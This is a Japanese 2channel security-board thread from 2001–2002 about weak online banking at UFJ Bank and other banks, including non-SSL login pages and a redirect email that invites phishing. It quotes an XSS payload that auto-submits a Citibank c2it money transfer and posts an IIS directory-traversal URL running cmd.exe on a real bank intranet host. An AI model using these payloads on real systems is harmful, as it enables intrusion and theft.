そうでもないよ。>>120 が言うように One's DIRECT を申し込む前からキャッシュカードの暗証番号を照会できる機能がインターネットに晒されてるわけで。口座持ってるだけで危険。

既に One's DIRECT を契約した口座だとこの機能が使えなくなるみたいだから、むしろ One's DIRECT を契約したほうが安全になるね。

結論: 口座作ったらすぐに One's DIRECT を契約。「暗証カード」が送られてきたらすぐに焼却処分。これ最強。

ﾃﾞﾀ（・∀・）!!!!

https://www.netsecurity.ne.jp/article/1/3641.html
預金者の口座を許諾なしに危険にさらす「残高照会サービス」(2001.12.27)
https://www.netsecurity.ne.jp/article/1/3642.html
アイワイバンクのログオン画面に通信が暗号化されない不具合(2001.12.27)

>>127
２ちゃんねるの後追いカコワルイ(w

>>127
ここで紹介されているログインページがどうしても表示できないんですが、
なにか起こっているのかな？
（データがサーバーから多量に送りつけられている状態）

ページが見つからないわけでもないみたい↓
http://www.iy-bank.co.jp/service/internet/banking/index.html

このスレに出てきた以上の情報がまったくない…。
記事からこのスレにリンクをはらなきゃダメだろ。道義的に。

1はカミ。

>>127
ここがネタ元なの丸わかりじゃないの。
少なくとも出所は示すべきだな。

>127
記事にする前にまずは金融監督庁や全国銀行協会とかK札にもチクっとけよ！

http://headlines.yahoo.co.jp/hl?a=20011227-00000004-vgb-sci

>>133
ここは、相手に取材するよりも前に情報を流すよね。
まずは、報道することからはじめるという姿勢。それはそれでよし。

この前は、IPAのサーバーが止まったままとか報道していたな。
実際は、IPAのサーバーのIPが変わったので、ルーティングが
うまくされていないことがあったそうで。

>>127
アハハー、ここの情報そのままじゃん。ちょっとは自分で取材とか検証とかしろよなー。
Scanって裏を取らない記事流すこと多いけど、いつか訴えられると思うど。

ANSER-WEBスレじゃなくてScanスレになってきたので、ちょいとsage。

口座NO.暗証の「危険性」は素人的には危ないが、正直世界中でこれまで何の問題も起こってないから
のープロブレムでしょ。

暗証固定で口座グルグルしてるくらいなら、ナンも考えずに田園調布の豪邸に突っ込んだ方がマシなんじゃないの？
よってこのスレは妄想系セキュリティヲタのオナニースレと言うことで、>>1が張り付いてるみたいだけどSAGEの方向で。

>>1
お前が騒ぐ前に誰かやってるよ。犯罪のリスクリターンを考えれろ。バカ


。

>>137
口座いじくって金を取るのは難しいと思うけど、その逆はどうよ？
口座番号は連番だから、プログラムで片っ端からロックして回る。
この金融不安のおりに、こんな事やられちゃ銀行もたまらんだろ。
脅迫ネタに使うか、鉄砲で一山狙うということも考えられるのでは？

>>137　銀行関係者ﾊｹｰﾝ

よくわかんないけど、金銭的な詐欺やそういうのより、愉快犯の方が怖いと思うんだけどな。

いよいよみんな自宅に戻りだしたな。
自宅でのんびりしてればいいのに。一月くらい。

>>137
こういう奴が居るから日本はダメなんだろうな。
狂牛病しかり、問題が起こってからしか対処しない。
こういう奴らは土木作業の仕事でもしてろ。

>>142
金も個人情報もいらないけど、いたずらしたいって向きにはちょうどいいよね。
こういうシステム。

イタズラは好きですが銀行はｺﾜｲのでぼくにはできません。

>>144
自宅や会社やネットカフェ以外の場所に、ネットにつながったPC
何台あるやら。日本中に。
店頭デモ機やらいろいろ。

口座番号が判っている取引先の預金残高を信用情報として黙って知る。

三井住友つかっているが暗証カードを使った第二暗証に
なんの意味があるのか俺も良く分かってない。
でも、8桁暗証番号なんかにしても結局、紙に書いて持ち歩く
ようになるんじゃないだろうか。

>>120
私が三井住友に申し込みをしたときは紙の書類に
判子とか押して送り返さないといけなかったけど。
インターネットからの申し込みだけで完結するように
なったのか。それは確かに危ないね。

>>143
わざわざロックして回らんでも、過負荷で簡単に落ちることを、
ジャパンネット銀行が実証してくれましたな。
ゴールデンウィーク明けが楽しみだ（w

ゴールデンウィーク明け?

>>150
連休でお金使い果たした後の平日って意味でしょ？きっと(笑)

>>149
そのうち銀行お抱えSEが、ボケ頭取に命令されて他行のサーバ落すDDoSツールでも流す
世の中来たりして（ｗ

警告：この掲示板は監視になりました。
http://tanutanu.net/economy/econ169.html

>>153 風説でなく、事実だよ。（ｗ

>>153
そのサーバApache1.3.9なんだね。わざとかな？

>>129
ページが無いみたいだね。

http://www.iy-bank.co.jp/missing.html
ここに飛ぼうとして、そこからまた同じところにredirectionされてる。(無限ループ)

どこでもいいから、 http://www.iy-bank.co.jp/sdfsdf
とか、なさそうなページを見ようとすると同じ現象になる。

>>156
そうだね。
しかし驚いたね。いまだにそれが直ってなかったなんて。
不審なアクセスログの監視とか、やってないんだろか。

過負荷が原因てマジで思ってるわけじゃないよね？ >>149

Host: www.iy-bank.co.jp

Referer: http://www.lolita.com
User-Agent: （　´∀｀）
↑コレで逝ってみた。。。

Server: Apache/1.3.22 (Unix) PHP/3.0.18-i18n-ja-2
Last-Modified: Mon, 31 Dec 2001 15:00:06 GMT
HTTP/1.1 200 OK
>>157
コレで、ログ取ってたら漏れは、ピーポ君に通報されるにょか？？

>>158
技術に詳しいなら、今回の事態を我々シロウトにもわかるように解説してほしいものだ。
皮肉だか何だか、同業者しかわからない一行コメントで得意になってないでさ。
ログインができなくなったのは、技術屋さん的には「過負荷」とは言えないかもしれんが、
webサーバが落ちたのは過負荷以外の何物でもないと思うのだが？

>>160
俺もシロートだが>>158の言いたい事ぐらいわかるぞ。

ジャパンネット銀行の件はよく知らんが
サーバが落ちる要因としては過負荷だけが原因になるものではない。
システムの不具合、ウィルス、etc...
今時のサーバは多少の過負荷ぐらいじゃ落ちないと思われ。

まぁ、ゴールデンウィーク明けとか書いてる時点で
貴方が舐められてしまうのはしょうがない。

＞まぁ、ゴールデンウィーク明けとか書いてる時点で
＞貴方が舐められてしまうのはしょうがない。

ふむ。ペイオフ解禁後の初のアクセス集中日、くらいの気持ちで書いたんだけどね。
確かにGWは各行のATMが稼働しているが、他行振り込みは休みだよね。

ユーロの初日、ヨーロッパのあちこちの銀行が落ちたんだよね？
市民がATMに殺到して。

>>162
じゃぁ、その時に書かないと。
>149の文脈で普通そこまで理解できないよ。
自分の脳内でしか分からない事を書かれてもな。
それじゃぁ>>158と同レベル、いやそれ以下。

>>164
煽るなよ（w
振込予約をせっせと処理しているところへ、休み明けで出社したサラリーマンがいっせいに接続したら、
相当つらいだろうな、と私の脳内では想像しておるのだ。笑わば笑え。

>>165
そうかなぁ、俺案外そんなところで落ちたんじゃないかと思って
ブラックジョーク感じたけどね。
複数人のプロジェクトでプログラムのコーディングやると、
なかにはとんでもないコーディングをする坊やもいるからね。
納期のデッドエンドやカットオーバーの都合で、気づかない振りして納品する
プロジェクトリーダーもいるし。

>>166
うん、落ちた原因はそんなところにあるとは思う。
サーバが一部しか稼働していなかったとJNBも認めているしね。
ただ、ウェブのほうが落ちたのは明らかに過負荷だよ。
これは私が勘違いしていたんだが、ここはセキュ板だったね。
速報と違ってリアルタイムでウォッチしていた人は少ないのかな？
http://choco.2ch.net/test/read.cgi/news/1010110377/l50

結局、何かした奴はここに居るの？
口座を覗き見るのはやったときあるが、それ以上は俺には出来ません。コワイから（藁

俺も参考にしたいんだが、覗き以上のことをやった奴っているのか？
「白夜書房月刊ハッカー」を読んでその気になった厨房のオナニーの見せ合いか、ここは？
って優香、経験者に訴えるようなレスはここにはないよな。

お前らアホか。こんなこと考えるより、明日の事とか人生の事とか考えろよ。
もう少し人生を真面目に考えたら、もう少しマシな専門学校に入れるかも知れんぞ・・・・代アメとか。

2chねらーは基本的に全員人生の敗北者ですが何か？

>>169
人生で失うものがあるような幸せな人は
２ちゃんねるは眺めるだけで書き込みはしないよな(笑)

61.255.106.24

あげ

ｼｽﾃﾑ屋もそこまでﾊﾞｶじゃないYO!
ﾊﾞｶみたいにｽｸﾘﾌﾟﾄ回すと捕まるYO!

>>173
自分でスクリプト回さなくても、
他人に調べさせるリンクが作れるからねえ。
スパムでばら撒いてもいいし。

>>173
例えば､アリスがボブに長いメッセージを送るたびに
ボブがアリスに長い返事を返して､さらに五人に長いメッセージを送るとしよう
これは､命令系統を示唆している。
アリスは明らかにボブに指令を送って
ボブはそれを下位の連中に流しているわけだ
もしアリスが定期的に短いメッセージをボブに送っていたのが
急に長いメッセージをたくさん送ったら
何かが変わったことがわかる。

>>175
つまり権限は
アリス>ボブ>部下5人
ということか?

自動化は、攻撃者の友だ。
賢い偽金づくりが、完璧な五セント玉を偽造する方法を見つけたとしよう。だれも
そんなことは気にするまい。時間と労力に見合うだけの五セント玉を作るのは無理
だろうから。
サイバー空間となると話はちがう。コンピュータは退屈な反復作業にはものすごく
強い。寝ている間に何百万もの電子五セント玉を作れる。
もし、すりのすばらしい手口があったとしても、それが１０万回に一度しか成功し
なかったら、だれかの財布を盗む以前にたぶん飢え死にするだろう。サイバー空間
では、コンピュータを設定して、１０万に一回の機会を探すようにできる。たぶん、
毎日、数十くらいは見つかるだろう。ほかのコンピュータも動員できたら、数百は
いくかもしれない。

それ本で読んだ。

>>178
なんて本？

>>173

あのシステム作ってる時点で馬鹿だろ。
奴らにアノマリ検出できるのか？

　ここに書き込みしてる奴で実際に試した奴いるの？

厨房の集まり？
それとも専門学校生？
あっごめん、専修学校（藁

具体的な方法論とか書けなくて、アングラ系の齧り読みを誇らしげに書いてる身障者の集いか、ここは？
あっ、身障者っって言っても社会的不適合系のやつな。
　お前らこんなこと書いてもスキルが無いんだから、もっと勉強しなさい。そうしたら市内で１０番目くらいに大きな
コンビニに勤めても虐められないくらいの会話術が身に付くから（藁

低学歴のお前らが喚いて、銀行のシステムは問題有りだとか言っても仕方が無い。
お前らには何も出来ないのだから。←これ真実。

>>181
その論旨の当然の帰路としてあるべき

「俺？俺は(やったよ)(やるわけないだろ)」
が抜けています。

というか、そもそもあなたには、他人に読ませるべき文章を構成する言語構成力が
欠如しているようですので、その点の自己認識を強く持っていないと、
公的私的問わず、第三者が目にするような文書を作成する際に
恥をかきます。

>>182
なんか悔しそうでカッコ悪い。

>>182
あと、言葉の使い方がおかしい。

　帰路＝用事が済んで帰りの方向に向かっていること。

帰路は「あのみちーはー、いつか来たみーちー」の「みち」の意味しか無いと思う。
って優香、「当然の帰結として・・・」と書くべきかなあと思う。

お前、専修学校？

>>184
ｷｬｯ。

nanasi＝ＮＴＴデータをクビになりそうなﾔｼ

大和
ってゆうか　潰れかけ

181=nanasi

>>184
って優香、って書いてる奴にいわれた悲惨な>>182がいるスレッド。
とうぜんnanasiはもっとヒサン(笑)

このスレッドって
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ
ﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟﾌﾟ

東海銀行がＵＦＪ銀行のログインページを作っているんだけど、
ログインページにＳＳＬがかかっていないから、偽装の可能性。

http://www.csweb.co.jp/TBK/ufj/login.htm

ログインできない問題の方が大きいのか、契約番号とかが筒抜けに
なる問題のほうが大きいのか、っていうことなのかな？

ログインボタンを押した次の画面が https のようだけど？
FORM NAME="SEND" ACTION="https://sso.ufjbank.co.jp/sso/dfw" METHOD="POST" onSubmit="return OK()">

>>192
ログイン先は問題ないんだけど、こういうのってどうなんだろうって。
誰か親切で、こういう銀行のログインページを作ってあげてもいいのかな？
※作った本人には契約番号とかはわからないのは理解してます。

で、あちこちにログイン用ポータルができたときに、ログインボタンのポスト先を
「まれに」適当なサイトにしておく。

>>193
http://www.csweb.co.jp/TBK/ufj/login.htm
が改竄されていないことが保証されていないね。SSLじゃないから。
あと、DNS spoofingでドメイン名が csweb.co.jp でも、ニセのIPアドレスに
アクセスさせられていないとは限らないね。
そういったことがないことを保証するのも SSL の役割。

ちなみに、
> 誰か親切で、こういう銀行のログインページを作ってあげてもいいのかな？
他所のドメインにログインページがあっても、それを信じてしまうのは信じる者の責任。
基本的には信じちゃいけない。

ところで、csweb.co.jp ってドメイン、どこの会社のもの？

http://www.csweb.co.jp は、UFIT Internet Service。
ホムペ見てちょ。

Domain Information: [ドメイン情報]
a. [ドメイン名] CSWEB.CO.JP
e. [そしきめい] かぶしきかいしゃ しーえすせぶん
f. [組織名] 株式会社 シーエスセブン
g. [Organization] CS7 Co., Ltd.

UFJ銀行との関係がよくわからない会社。

さらに、https:// のページのサーバ証明書の内容が

CN = www.csweb.co.jp
OU = Technology dept. 2
O = Central Systems Co.,Ltd.
OU = Member, VeriSign Trust Network
OU = Authenticated by VeriSign Japan K.K.
OU = Terms of use at www.verisign.co.jp/RPA (c)00
L = Nagoya
S = Aichi
C = JP

で、これまた会社名が別。

あなたは何を信じますか？

検索してみた

セントラルシステムズ株式会社は、2001年４月1日
株式会社ユーフィットに社名変更いたしました。
http://www.ufit.co.jp/index.htm

会社名 ： 株式会社ユーフィット　　

事業内容 ： １．電子計算機などを利用する情報処理システム開発、ソフトウエア開発ならびに計算

株　　主 ： 株式会社ＵＦＪ銀行 ＵＦＪ信託銀行株式会社
株式会社日立製作所 株式会社ＵＦＪカード

日本アイ・ビー・エム株式会社 株式会社セントラルファイナンス
ティアイエス株式会社 株式会社ＵＦＪキャピタル
あいおい損害保険株式会社 岡谷鋼機株式会社
セントラルリース株式会社 中京テレビ放送株式会社
エヌ・ティ・ティ・コミュニケーションズ株式会社 株式会社ジェーシービー
つばさ証券株式会社 東海東京証券株式会社
日本興亜損害保険株式会社 日本ヒューレット・パッカード株式会社
日本オラクル株式会社 株式会社東海総合研究所
株式会社三和総合研究所 太陽生命保険相互会社
大同生命保険相互会社 　他
　(2002年1月現在)

https://www.ufjbank.co.jp/ib/login/index.html

190は粘着だなあ。
何度も登場してるよ。

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊
　　　　　　　　　　　　　ＵＦＪ銀行誕生ごあいさつ
　　　　　　　　三和銀行と東海銀行は、ＵＦＪ銀行になりました
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

三和銀行と東海銀行は、2002年1月15日に合併し、ＵＦＪ銀行として新たに
スタートいたしました。

――――――――――――――――――――――――――――――――――――――
　　　　　　　　インターネットバンキングのご利用について
――――――――――――――――――――――――――――――――――――――

●現在、ＵＦＪ銀行のホームページは、アクセス集中により、大変つながりにくく
　なっております。お客さまには大変ご迷惑をおかけし、誠に申し訳ございません。
　しばらく経ってからご利用いただきますようお願い申し上げます。

　尚、インターネットバンキングのご利用は、当面、下記のＵＲＬよりログイン
　していただきますようお願いいたします。

　　http://www.csweb.co.jp/TBK/ufj/login.htm

このメールに対する返信は受付できませんので、ご不明な点等がございましたら、
下記までお問い合わせください。

――＜お問い合わせ先＞―――――――――――――――――――――――――――
合併に関するお問い合わせは、
＜合併照会センター＞
　フリーダイヤル：0120-167-490（東日本地区）
　フリーダイヤル：0120-802-862（東海地区）
　フリーダイヤル：0120-411-658（西日本地区）
　受付時間／9:00から17:00まで（銀行窓口休業日を除く）

インターネットバンキング、モバイルバンキング、テレビバンキングに関する
お問い合わせは、
＜インターネットバンキングヘルプデスク＞
　フリーダイヤル：0120-309-619
　携帯電話・ＰＨＳからご利用の場合：03-5430-6011
　受付時間／9:00から21:00まで（年中無休）
　Ｅメールでのお問い合わせは、
　https://csupport.ufjbank.co.jp/helpdesk/ib_email.html

テレフォンバンキングに関するお問い合わせは、
＜ＵＦＪちょっとコール＞
　フリーダイヤル：0120-898-506（バンクは　コール）
　携帯電話・ＰＨＳからご利用の場合：03-5432-7324・0568-26-2782・06-6378-2971
　受付時間／月曜から金曜9:00から21:00まで　土曜9:00から17:00まで
　（祝日・12/31から1/3まで・5/3から5/5までを除く）

◇このメールは、旧三和インターネットバンキング2000ご契約者および
　旧＜東海＞ダイレクトの方に配信しております。
――――――――――――――――――――――――――――――――――――――
こたえていくチカラ。
株式会社ＵＦＪ銀行

>>201
＞こたえていくチカラ。
＞株式会社ＵＦＪ銀行

なのに、

＞このメールに対する返信は受付できませんので、ご不明な点等がございましたら、
＞下記までお問い合わせください。

なのね。

>>201
　尚、インターネットバンキングのご利用は、当面、下記のＵＲＬよりログイン
　していただきますようお願いいたします。
　http://www.csweb.co.jp/TBK/ufj/login.


メールでログイン画面（しかも普段と違うところ）に誘導することって本当にあるんだね。驚いたよ。
偽のメールが来ても警戒する人なんてほとんどいないだろうなあ。

銀行に限らず、まともにセキュリティ考えてる会社なら、
「弊社からお客様に直接○○することはございません」
って普通書くよね。実際ときどきそういうの見かけるし。

>>203　遠い昔に流行ったよね。ATMや夜間金庫の前に自作ダンボールで
ニセ夜間金庫作った犯罪。

過去の犯罪・・「故障しておりますので現金はこちらにお入れ下さい」→
これからの・・・「尚、インターネットバンキングのご利用は、当面、
下記のＵＲＬよりログインしていただきますようお願いいたします。」

>>204
これのこと?
ttp://www.pdc.npa.go.jp/hakusyo/s49/0134.jpg

>>205　よくあったね。こんな物で当時は結構引っ掛かった人がいた。

良い事聞いた

この手の話って、BUGTRAQ あたりに報告するのは
間違っているのかな？

モデレータが流さないかもしれないけど。

で、本当に問題があるのか無いのかについては
識者が判断してくれるでしょう。

>>208　BUGTRAQは米国のメーリングリストのことでしたよね？。それに載るとお祭りになりそう　(w
SSLではないインターネットバンキングなんて口座番号とパスワードを見られる覚悟で作ったのか
そのシステムの投資をケチったのか。

去年はメアド流出事件が多発したけど、正直たいした問題じゃねえと漏れはｵﾓﾀﾖ。
だが、このスレ見て、やばいことだったんだと目が覚めたよ。

銀行ユーザのメアド流出
　　　　↓
（数ヶ月経過、皆忘れる）
　　　　↓
銀行にDoS攻撃、つながりにくくなる
　　　　↓
現在、○○銀行のホームページは、アクセス集中により、大変つながりにくく
なっております。お客さまには大変ご迷惑をおかけし、誠に申し訳ございません。
当面、下記のＵＲＬよりログインしていただきますようお願いいたします。
https://www.関連SI子会社ドメイン.com/login.cgi
　　　　↓
ニセ銀行ログイン画面にみんなそろってログイン　　　　↓
　　　　↓
（ﾟдﾟ）ｳﾏｰ
（ﾟДﾟ;）ﾏｽﾞｰ
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

未解決！シティバンクのオンラインサイトにクロスサイトスクリプティング問題
http://www.zdnet.co.jp/enterprise/0201/09/02010913.html

https://www.c2it.com/C2IT/SendCash
<script> setTimeout("alert(document.forms[0].SRC_ACCOUNT.options[1].value)", 400); </script>
--
<script>
w=window.open("SendCash", "s","");
setTimeout("f=w.document.forms[0];f.DEST_EMAIL.value='[email protected]';
f.AMOUNT.value=10;f.submit();",15000);
setTimeout("w.document.forms[0].submit();", 15000);
</script>
---
http://www.devitry.com/c2it-security.html

すまそ

誤 https://www.関連SI子会社ドメイン.com/login.cgi
正 https://www.関連SI子会社っぽいドメイン.com/login.cgi

Scanから、いつもながらの情報がでているね。

UFJ銀行のサーバーにクロスサイトスクリプティングの脆弱性
http://headlines.yahoo.co.jp/hl?a=20020117-00000002-vgb-sci

>>213
□ 関連情報
iPlanet Web ServerとNetscape Enterprise Serverにサービス妨害を受ける脆弱性

てのが紹介されてるけど、関係ないのでは？WinNTだけだって書いてあるし。
UFJはWinNTなのか？

>このサーバーでは、「Netscape-Enterprise/4.0」が利用されており、
>このバージョンにはクロスサイトスクリプティングの脆弱性があることが
>確認されている。

% w3m -dump_head http://www.ufjbank.co.jp/
HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP3
Date: Thu, 17 Jan 2002 05:10:10 GMT
Content-type: text/html
Connection: close

こんなん出ましたが…？ 4.0？

OS, Web Server and Hosting History for www.csweb.co.jp
OS Server Last changed IP address Netblock Owner
Solaris Netscape-Enterprise/3.6 SP1 2-Oct-2001 202.232.169.145 UFIT Co., Ltd.
Solaris Netscape-Enterprise/3.6 SP1 1-Nov-2000 202.232.169.145 UFIT Co., Ltd.

>>215
こっちでやってみると4.0になる。はて？

% telnet www.ufjbank.co.jp 80
Trying 202.232.254.74...
Connected to www.ufjbank.co.jp.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 500 Server Error
Server: Netscape-Enterprise/4.0
Date: Thu, 17 Jan 2002 05:19:20 GMT
Content-length: 358
Content-type: text/html
Connection: close

>>216
うひ、3.6SP1とはひどいな。
(((ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

誰か銀行のサーババージョン一覧作ってくれないかな。
ペイオフ解禁も近いし口座移さねば。

SSL details for www.ufjbank.co.jp

Organisation as given by certificate
Terms of use at www.verisign.co.jp/RPA (c)00
Authenticated by VeriSign Japan K.K.
Member, VeriSign Trust Network
Direct Banking Dpt1.
UFJ Bank Limited
Chiyoda-ku
Tokyo
JP

Common name: www.ufjbank.co.jp

HTTPS Server
Netscape-Enterprise/4.0
Supported SSL ciphers:

RC4 with MD5
RC4 with MD5 (export version restricted to 40-bit key)
RC2 with MD5
RC2 with MD5 (export version restricted to 40-bit key)
DES with MD5
Triple DES with MD5
Certificate Administrative Details
Valid from: Dec 5 00:00:00 2001 GMT
Valid to: Dec 19 23:59:59 2002 GMT
Serial number: 0x748d492d8e2f99ece6f60fab34350243

Certification Authority
Secure Server Certification Authority
RSA Data Security, Inc.
US

>>215 >>217
５回に１回くらいの割りで 3.6 SP3 が出るみたい。
あと、５回に１回くらいの割りで 4.0 SP6 も出る。

福引かよ！

OS, Web Server and Hosting History for www.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
Solaris Netscape-Enterprise/4.0 16-Jan-2002 202.232.254.74 The Sanwa Bank, Limited
BSD/OS Netscape-Enterprise/4.0 13-Jan-2002 202.232.254.74 The Sanwa Bank, Limited

http://uptime.netcraft.com/　より

＞＞１
そんなに弱そうなら早いとこハックでもして金でも盗めば？

>>220
ラウンドロビンしてるわけでもないから、L4SW かなにかで
複数のサーバにトラフィックを分散させてるのかな？

振込先口座番号を公開しているところはいくらでもあるような気がするけど・・・
そしたらあとは4桁の暗証番号をブルートフォース？
3回間違えば凍結なら安全だけど・・・
ちょっと怖いね。ネットバンク…
自分のPCにトロイが感染していたら…

PC−JAPANって雑誌にネットバンクのセキュリティの話があったような気がする。
↑な本読んでるのかお前。厨房だなって煽りは止めてね。
実際、房だけどね…

利用者としてはATMとかの暗証番号をもっと難しくして欲しいのだけど…
数字4桁はあまりに安易だと思うのですが…

>>225
激しく同意。
ついでに、クレジットカードも番号だけで決済できるのではなく、
暗証番号必須にしてほしい。

>>226
そもそも、クレジットカード番号だけで決済できることが
どこか間違ってるような気がする。
ジェネレータツールで簡単に番号取得できるらしいが…。

使用期限年月日込みだとしても、年月を総当りで試しても
大した数ではないし。

>>221　
そこのサイトでチェックできるんだ。教えてくれてありがとう。
某取引銀行をチェックしてみると少し安心した・・・少しね。

>現在最高水準のSSL128bit（Secure Socket Layer 128bit)という暗号化技術を採用
OS Server Last changed IP address Netblock Owner
Solaris Apache/1.3.19 (Unix) 18-Apr-2001 202.219.146.208 InfoWeb
Solaris Apache/1.3.14 (Unix) 11-Dec-2000 202.219.146.208 InfoWeb
Solaris Netscape-Enterprise/3.5.1 13-Oct-2000 210.131.77.11 FUJITSU LIMITED
Solaris Netscape-Enterprise/3.5.1 15-Jun-1999 210.131.77.11 FUJITSU LIMITED

>>227
クレジットカードは保険が利くが、
キャッシュカード、デビッド、インターネットバンキングの被害には保険がなく
何かあっても銀行は補償してくれないのだから、性質が異なる。

このスレが感謝されてるよ
最下行の関連情報ね。
https://www.netsecurity.ne.jp/article/1/3763.html

2chって影響力あるね（･∀･）ｲｲ!
>>1はUFJ銀行から謝礼もらえるんじゃぁない（藁？

>>232

>>130 の人がリンク張らなきゃだめだろーと、指摘したからでしょうね。

>232の紹介してくれたサイト、YBBのセキュリティ問題も記事にして欲しいよね？
YBBユーザー可哀相だよ。

>>235
共有問題は、すでに去年の10月に記事になってますよ。
確認してくれ。
https://www.netsecurity.ne.jp/article/1/2934.html
DHCPでパケット丸見え問題は記事になっていたかは忘れた。

この件に少しだけど関われてうれしい・・・感謝されて更にうれしい

なんか謎のサイト発見したよ。こんなものが書いてある。

Personal Page
UFJ Bank Limited

http://personal.ufjbank.co.jp/

>>240
https://personal.ufjbank.co.jp/

なんじゃこりゃ

>>241
なんか、１５日に見たことがあるよ、この画面（ぉ

> 申し訳ございません。
> ただいま回線が大変混雑しております。

OS, Web Server and Hosting History for personal.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
HP-UX Netscape-Enterprise/4.1 18-Jan-2002 202.232.254.71 The Sanwa Bank, Limited

おぉ！ベッコアメで、Linuxで動いていたのか〜〜

http://chikara.ufjbank.co.jp/
OS, Web Server and Hosting History for chikara.ufjbank.co.jp
Linux Apache/1.3.22 (Unix) PHP/4.1.1 mod_ssl/2.8.5 OpenSSL/0.9.6 18-Jan-2002 202.231.211.37 BEKKOAME INTERNET

OS, Web Server and Hosting History for intra.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
Solaris Netscape-Enterprise/3.6 18-Jan-2002 202.232.254.77 The Sanwa Bank, Limited

OS, Web Server and Hosting History for direct.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
HP-UX Netscape-Enterprise/4.1 18-Jan-2002 202.232.254.75 The Sanwa Bank, Limited

OS, Web Server and Hosting History for lifeplan00.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
AIX IBM_HTTP_Server/1.3.6.4 Apache/1.3.7-dev (Unix) 18-Jan-2002 202.232.254.76 The Sanwa Bank, Limited

OS, Web Server and Hosting History for escrow.ufjbank.co.jp
OS Server Last changed IP address Netblock Owner
unknown Microsoft-IIS/4.0 18-Jan-2002 210.166.178.58 The Sanwa bank Limited

２４８のunknown Microsoft-IIS/4.0って危ないかと。

>>245 が書いたイントラサーバーはなにかあると思ったら、こんなのが見えます。
外部からのアクセスが可能になっているとまずいものがありそうだ。

http://intra.ufjbank.co.jp/image/tit_cloan.gif

ディレクトリ一覧はこちら。
http://intra.ufjbank.co.jp/image/

http://sam.adam.ne.jp/c/ff/
ここのチャットにビックリ
最初は普通のチャットだと思ったんだが、何日か経つと、仕組みがわかった。
マジスゲーナ

>>250　中身の直リンはヤメレ

http://intra.ufjbank.co.jp/scripts/..%252f../winnt/system32/cmd.exe?/c+dir

https://www.netsecurity.ne.jp/article/1/3763.html

□ 関連情報

・2ch ここの銀行のセキュリティって甘そう
　記事の作成にあたり、本掲示板の情報をもとに検証作業などを行いました。誌面より、お礼を申し上げます。この掲示板には詳細な情報が掲載されているため、UFJ 銀行の対処が完了するまで、掲載を控えておりました。あらかじめご了承ください。

　http://pc.2ch.net/test/read.cgi/sec/1007968094/

とさ。

今日、UFJからトップログイン画面がどうたらってメールが来てた。
セキュリティのことは何も書いてなかったけど、関係あるのかな。

>>256
見たいYO！

＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊
　　　　　　臨時ログイン画面閉鎖のお知らせ　　　　　ＵＦＪ銀行
＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊＊

1月15日、合併直後にアクセスが集中し、ＵＦＪ銀行ホームページにつながりにくい
状況が発生いたしました。
この際、インターネットバンキングをご利用いただくために、旧東海銀行のサイトに
臨時ログイン画面を設置し、旧東海銀行ホームページからのアクセスを可能といたし
ましたが、このたび臨時ログイン画面を閉鎖いたしました。
ご利用のお客さまには、大変ご迷惑をおかけいたしましたが、この臨時ログイン画面
は、合併直後の一時的な措置であり、今後はＵＦＪ銀行のホームページからログイン
